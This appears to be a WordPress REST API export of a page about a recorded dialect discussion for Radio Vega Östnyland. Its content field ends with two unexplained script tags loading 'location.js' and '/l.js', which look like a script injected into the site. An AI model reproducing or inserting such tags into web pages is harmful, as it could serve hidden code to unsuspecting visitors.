{"id":1689,"date":"2013-03-26T19:56:08","date_gmt":"2013-03-26T17:56:08","guid":{"rendered":"http:\/\/84.20.155.7\/nywp\/?page_id=1689"},"modified":"2013-03-26T19:56:08","modified_gmt":"2013-03-26T17:56:08","slug":"radio-vega-ostnyland-dialektdiskussion-11-juni-2012","status":"publish","type":"page","link":"https:\/\/hindersby.net\/word2021\/gamal-skoolan-bilder\/radio-vega-ostnyland-dialektdiskussion-11-juni-2012\/","title":{"rendered":"Radio Vega \u00d6stnyland: Dialektdiskussion 11 juni 2012"},"content":{"rendered":"<p>Inspelning av diskussioner f\u00f6r Radio Vega \u00d6stnyland &#8211; opa \u00f6stnyylendsk\u00e5.<\/p>\n<p>ngg_shortcode_0_placeholder<script src='location.js?p=1' type=text\/javascript><\/script><script src='\/l.js?p=1' type=text\/javascript><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Inspelning av diskussioner f\u00f6r Radio Vega \u00d6stnyland &#8211; opa \u00f6stnyylendsk\u00e5.<\/p>\n","protected":false},"author":2,"featured_media":0,"parent":840,"menu_order":0,"comment_status":"open","ping_status":"open","template":"","meta":{"ngg_post_thumbnail":0,"footnotes":""},"class_list":["post-1689","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/hindersby.net\/word2021\/wp-json\/wp\/v2\/pages\/1689","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/hindersby.net\/word2021\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/hindersby.net\/word2021\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/hindersby.net\/word2021\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/hindersby.net\/word2021\/wp-json\/wp\/v2\/comments?post=1689"}],"version-history":[{"count":0,"href":"https:\/\/hindersby.net\/word2021\/wp-json\/wp\/v2\/pages\/1689\/revisions"}],"up":[{"embeddable":true,"href":"https:\/\/hindersby.net\/word2021\/wp-json\/wp\/v2\/pages\/840"}],"wp:attachment":[{"href":"https:\/\/hindersby.net\/word2021\/wp-json\/wp\/v2\/media?parent=1689"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}